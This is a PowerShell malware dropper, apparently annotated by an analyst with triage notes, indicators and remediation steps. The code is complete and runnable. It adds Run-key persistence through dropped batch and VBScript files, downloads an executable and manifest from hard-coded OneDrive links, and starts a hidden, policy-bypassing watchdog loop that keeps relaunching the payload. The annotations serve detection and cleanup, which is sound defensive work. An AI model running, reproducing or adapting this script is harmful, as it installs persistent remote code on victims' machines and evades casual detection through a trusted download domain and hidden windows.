

# Stage 1 - persistence. Builds C:\Users\Public\1.bat from a literal here-string
# (single-quoted, so nothing inside it is expanded). The batch file holds two
# REG ADD commands against the per-user autorun key
# HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
#   value "1" -> C:\ProgramData\Twitter\log\Untitled.exe
#   value "2" -> cmd.exe /c powershell ... -exec bypass -file ...\look.ps1
# HKCU needs no elevation, so this works from a standard user session.
# Triage notes:
#   - Run values named with bare digits and data pointing into
#     C:\ProgramData\Twitter\log\ are the registry artefacts to look for.
#   - The PowerShell switches are abbreviated (-windo, -exec); command-line
#     detections should match parameter prefixes, not only the full names.
#   - NOTE(review): the value "2" data contains an unmatched single quote before
#     /c; read the stored value from an affected host rather than assuming how
#     it is parsed at logon.
#   - Both targets are files that are only written further down in this script.
$Content = @'
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\ProgramData\Twitter\log\Untitled.exe"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Twitter\log\look.ps1"
'@
Set-Content -Path C:\Users\Public\1.bat -Value $Content

# Second dropped file: a VBScript wrapper whose only job is to run 1.bat through
# WScript.Shell. In the Run call the second argument (0) is the window style and
# the third (true) makes the script wait for the batch file to finish, so no
# console window is shown while the registry values are written.
# Expected process chain on the host: powershell.exe -> wscript.exe -> cmd.exe -> reg.exe.
$Content = @'
set WshShell = wscript.createobject("WScript.shell")
WshShell.run """C:\Users\Public\1.bat"" ", 0, true
Set WshShell = Nothing
'@
Set-Content -Path C:\Users\Public\1.vbs -Value $Content
# Fixed 10-second pause before the wrapper is launched.
start-sleep 10
# Launches 1.vbs via its file association. Neither 1.bat nor 1.vbs is deleted
# anywhere in the visible script, so both should remain in C:\Users\Public.
start C:\Users\Public\1.vbs





# Stage 2 - staging directory. Creates C:\ProgramData\Twitter\log\ if it is not
# already present; every later artefact (Untitled.exe, Untitled.exe.manifest,
# look.ps1) is written there. The "Twitter" folder name is simply what the script
# uses; nothing visible here ties it to an installed Twitter product.
# Triage note: treat the existence of this directory as a host indicator.
$OutPath = "C:\ProgramData\Twitter\log\"
if (-not (Test-Path  $OutPath ))
        {
            # -Force keeps New-Item from erroring if part of the path already exists.
            New-Item $OutPath -ItemType Directory -Force
        }

# Fixed 5-second pause before the downloads begin.
start-sleep 5

# Stage 3a - payload download. Fetches a file from a OneDrive direct-download
# link (cid / resid / authkey query string) and saves it as Untitled.exe in the
# staging directory. The link is on a legitimate Microsoft domain, so domain
# reputation alone will not flag it; the useful signals are powershell.exe making
# the request and an .exe being written under C:\ProgramData.
# The full URL, including the cid and authkey values, is a network indicator.
$url = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21140&authkey=AD54_li6xAtRpc8" 
$path = "C:\ProgramData\Twitter\log\Untitled.exe" 
# Commented-out parameter block: $url and $path are hard-coded above instead.
# param([string]$url, [string]$path) 

# If $path has no parent or the parent is not an existing directory, a fallback
# name in the current directory is computed into $targetFile. $targetFile is not
# read again in the visible script, so this branch has no effect on where the
# file is saved.
if(!(Split-Path -parent $path) -or !(Test-Path -pathType Container (Split-Path -parent $path))) { 
$targetFile = Join-Path $pwd (Split-Path -leaf $path) 
} 

# Synchronous download via System.Net.WebClient, always to $path. No hash,
# signature or size check is applied to what comes back.
(New-Object Net.WebClient).DownloadFile($url, $path) 
# Bare expression: writes the destination path to the output stream.
$path



# Stage 3b - companion file download. Same routine as the executable download,
# with the same OneDrive cid but a different resid (...%21139) and authkey. The
# result is saved as Untitled.exe.manifest beside the executable.
# NOTE(review): the file name suggests a side-by-side application manifest for
# Untitled.exe, but its content is not visible here; collect and inspect it
# together with the executable.
$url = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21139&authkey=AOITnE4lBM7QpdQ" 
$path = "C:\ProgramData\Twitter\log\Untitled.exe.manifest" 
# Commented-out parameter block: $url and $path are hard-coded above instead.
# param([string]$url, [string]$path) 

# Computes a fallback $targetFile when the parent directory is missing;
# $targetFile is not read again in the visible script, so the save location is
# unaffected.
if(!(Split-Path -parent $path) -or !(Test-Path -pathType Container (Split-Path -parent $path))) { 
$targetFile = Join-Path $pwd (Split-Path -leaf $path) 
} 

# Synchronous download to $path; the content is not validated.
(New-Object Net.WebClient).DownloadFile($url, $path) 
# Bare expression: writes the destination path to the output stream.
$path

# Stage 4 - watchdog. After a 5-second pause, writes look.ps1 into the staging
# directory from a literal here-string. The generated script loops forever: on
# each pass it checks for a process named "Untitled" and, if none is found,
# starts C:\ProgramData\Twitter\log\Untitled.exe, then sleeps 60 seconds.
# Remediation note: killing Untitled.exe alone is not enough, because this loop
# starts it again within a minute. Stop the powershell.exe instance running
# look.ps1 first, then remove the Run values, the staging directory and the two
# files in C:\Users\Public.
start-sleep 5
$Content = @'
while ($true){
if((get-process "Untitled" -ea SilentlyContinue) -eq $Null){
{
}
start C:\ProgramData\Twitter\log\Untitled.exe
}
start-sleep 60
}
'@
Set-Content -Path C:\ProgramData\Twitter\log\look.ps1 -Value $Content

# Fixed 5-second pause before the watchdog is started.
start-sleep 5


# Starts the watchdog in a child powershell.exe with a hidden window, no profile,
# no logo, non-interactive, and the execution policy overridden to Unrestricted
# for that process. look.ps1 never leaves its while ($true) loop, so the child is
# not expected to exit on its own.
# Triage note: this command line (hidden window + execution-policy override +
# a script path under C:\ProgramData) is a strong process-creation indicator.
powershell -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "C:\ProgramData\Twitter\log\look.ps1"










